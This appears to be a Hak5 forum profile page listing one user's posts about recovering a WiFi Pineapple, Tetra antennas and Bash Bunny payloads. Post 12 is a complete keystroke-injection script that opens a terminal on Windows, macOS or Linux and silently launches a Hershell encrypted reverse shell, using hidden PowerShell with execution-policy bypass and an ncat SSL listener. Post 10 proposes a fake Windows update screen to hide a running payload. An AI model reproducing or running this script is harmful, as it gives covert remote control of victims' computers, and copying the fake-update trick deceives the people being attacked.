
mkmk

Active Members
  • Content Count: 18
  • Days Won: 1

About mkmk

  • Rank
    Hak5 Fan


  1. Hey All. Does anyone know if there's a way to wipe the nano and use it like a Linux box with 2 WiFi APs? I'm hoping to have one AP permanently as a hotspot and the other connected to another WiFi network and sharing internet to the hotspot AP.
  2. Awesome work @Zylla. I think we can install this via opkg now too, or at least it seemed to work for me:
     opkg update
     opkg install tmux
     And I think the updated git location for @Zylla is https://github.com/adde88/openwrt-useful-tools/tree/packages-15.05 and also https://github.com/adde88/openwrt-useful-tools. But correct me if I'm wrong.
  3. My apologies @Foxtrot. After a bit more messing around it finally worked, as follows:
     • Held reset button
     • Plugged in power adaptor
     • Continued to hold power button for 10 seconds
     • Plugged USB cable into ETH
     • Executed "sudo ifconfig enx001337 192.168.1.2 netmask 255.255.255.0 up"
     • Connected to http://192.168.1.1 and updated firmware
     • Connected to Pineapple_XXXX via WiFi
     • Completed setup
     • Updated to latest firmware
     Thanks for your help!
  4. Unfortunately that doesn't work, i.e. the Web Console no longer appears. It appeared initially when I flashed the factory image as mentioned in my initial post, but the web console now no longer appears. Is there a way it can be flashed via UART?
  5. How do I flash the factory image if I can't access the web console?
  6. Hi All, unfortunately my Pineapple failed to complete a firmware update, so I attempted to install the update using the 192.168.1.1 http method. This appeared to work at first, but the amber light stayed on for more than an hour, so I tried resetting the unit. Unfortunately, the amber light stays on permanently now and I'm unable to access the http interface, even though I can appear to enable this via the serial console:
     uboot> httpd
     Using eth0 dup 1 speed 100
     MAC address: 0x0:0x3:0x7f:0x9:0xb:0xad
     HTTP server is starting at IP: 192.168.1.1
     HTTP server is ready!
     Also, I'm getting the "Bad Magic Number" error as shown below:
     uboot> boot
     Loading from device 0: ath-nand (offset 0x0)
     ** Bad Magic Number 0x73797375 **
     uboot> bootd
     Loading from device 0: ath-nand (offset 0x0)
     ** Bad Magic Number 0x73797375 **
     Is there a way I can load the factory image via the UART port? Thanks.
  7. Not a problem! Also, just to confirm. Hershell was written by Ronan Kervella and his Github contains several other interesting projects: https://github.com/sysdream
  8. Hey @JediMasterX. Feel free to give it a bash and let me know how you go on this forum or via pm. I'm aiming to have version 1.0 automatically detect the target OS and perform seamless exploitation but for now the OS selection is manual.
  9. Does anyone know if there is a way to specify which antennas to use when capturing / airodumping? I'm working on a device location type tool that will use specific antennas on the Tetra in order to physically locate clients.
  10. I'm sure other people have thought of this before, but a cool trick would be to full-screen a Windows update screenshot so the user thinks their machine is doing updates, then run your payload in the background. Anyone have any experience with this?
  11. Thanks for the tip. I'll do some investigation.
  12. Please PM me if there are any issues/improvements. Thanks!
     #!/bin/bash
     # Title: Hershell Encrypted Reverse Shell (Cross-platform - Manual Mode)
     # Author: metalkey
     # Version: 0.5
     # Target: Windows, Mac OSX, Linux
     # Creds: Ronan Kervella (Creator of Hershell) - https://github.com/sysdream/hershell
     # Instructions:
     # Hershell Github: https://github.com/sysdream/hershell (read all instructions on Hershell git before starting)
     # 1. Compile all payloads and place binaries in the payloads\$SWITCH_POSITION directory (Double check binary names. Defaults are mac32, linux32, win32.exe)
     # 2. Uncomment desired target OS payload lines and ensure others are commented out
     # 3. Start ncat listener on your attacking machine, that is to receive the reverse shell (e.g. ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 4343)
     # 4. Execute attack via Bash Bunny

     # SETUP
     DRIVER_LABEL='WINDOWS' # Drive label for your Bash Bunny
     LED R
     GET SWITCH_POSITION # Gets switch position (e.g. switch2)
     ATTACKMODE STORAGE HID SERIAL # Keyboard HID Attack + Storage + Serial

     # Modified RUN helper
     function RUN() {
       local os=$1
       shift
       [[ -z "$os" || -z "$*" ]] && exit 1
       case "$os" in
         WIN)
           QUACK GUI m
           QUACK DELAY 500
           QUACK GUI r
           QUACK DELAY 500
           QUACK STRING cmd.exe
           QUACK DELAY 100
           QUACK ENTER
           QUACK DELAY 500
           QUACK STRING "$@"
           QUACK DELAY 100
           QUACK ENTER
           ;;
         OSX)
           QUACK GUI SPACE
           QUACK DELAY 100
           QUACK STRING terminal
           QUACK DELAY 100
           QUACK ENTER
           QUACK GUI t
           QUACK DELAY 100
           QUACK STRING /bin/bash
           QUACK DELAY 100
           QUACK ENTER
           QUACK STRING "$@"
           QUACK DELAY 100
           QUACK ENTER
           QUACK DELAY 100
           QUACK STRING "exit"
           QUACK DELAY 100
           QUACK ENTER
           QUACK DELAY 100
           QUACK STRING "exit"
           QUACK DELAY 100
           QUACK ENTER
           ;;
         UNITY)
           QUACK ALT F2
           QUACK DELAY 1000
           QUACK STRING xterm
           QUACK DELAY 1000
           QUACK ENTER
           QUACK DELAY 1000
           QUACK STRING /bin/bash
           QUACK DELAY 1000
           QUACK ENTER
           QUACK DELAY 500
           QUACK STRING cd /media/'$USER'
           QUACK DELAY 500
           QUACK ENTER
           QUACK DELAY 500
           QUACK STRING "$@"
           QUACK DELAY 500
           QUACK ENTER
           QUACK DELAY 500
           QUACK STRING "exit"
           QUACK DELAY 500
           QUACK ENTER
           QUACK DELAY 500
           QUACK STRING "exit"
           QUACK DELAY 500
           QUACK ENTER
           ;;
         *)
           exit 1
           ;;
       esac
     }
     export -f RUN

     # START Attack
     LED Y

     # [+] Mac - Uncomment the following lines to use:
     # until ls -halt /dev | head -n 5 | grep -q "nandf"; do sleep 1; done # Wait for bb to mount
     # LED Y FAST
     # RUN OSX "cp /Volumes/$DRIVER_LABEL/payloads/$SWITCH_POSITION/mac32 /tmp && chmod +x /tmp/mac32 && /tmp/mac32 &"

     # [+] Linux - Uncomment the following lines to use:
     until dmesg | grep -q "sunxi_usb"; do sleep 1; done; sleep 5 # Wait for bb to mount
     LED Y FAST
     RUN UNITY "cd $DRIVER_LABEL/payloads/$SWITCH_POSITION && cp linux32 /tmp/ && chmod +x /tmp/linux32 && /tmp/linux32 &"

     # [+] Windows - Uncomment the following lines to use:
     # until dmesg | grep -q "sunxi_usb"; do sleep 1; done; sleep 5 # Wait for bb to mount
     # LED Y FAST
     # RUN WIN powershell -NoP -NonI -W Hidden -exec bypass ".((gwmi win32_volume -f 'label=''$DRIVER_LABEL''').Name+'\payloads\\$SWITCH_POSITION\win32.exe')"

     # END
     sleep 5
     LED G
     # shutdown 0 # LIGHTS OUT = Shutdown and dismount (if desired)
  13. This has worked well on the Mac systems I've tested: until ls -halt /dev | head -n 5 | grep -q "nandf"; do sleep 1;
  14. I've just started looking into the concept of determining the TARGET OS by checking the timestamps of hidden folders on the bb after it has been mounted, e.g. "System Volume Information", etc. Potentially something involving an ls -halt of the udisk directory, but it would be good if there are some better ideas to build on this concept. Has anyone had much experience with this?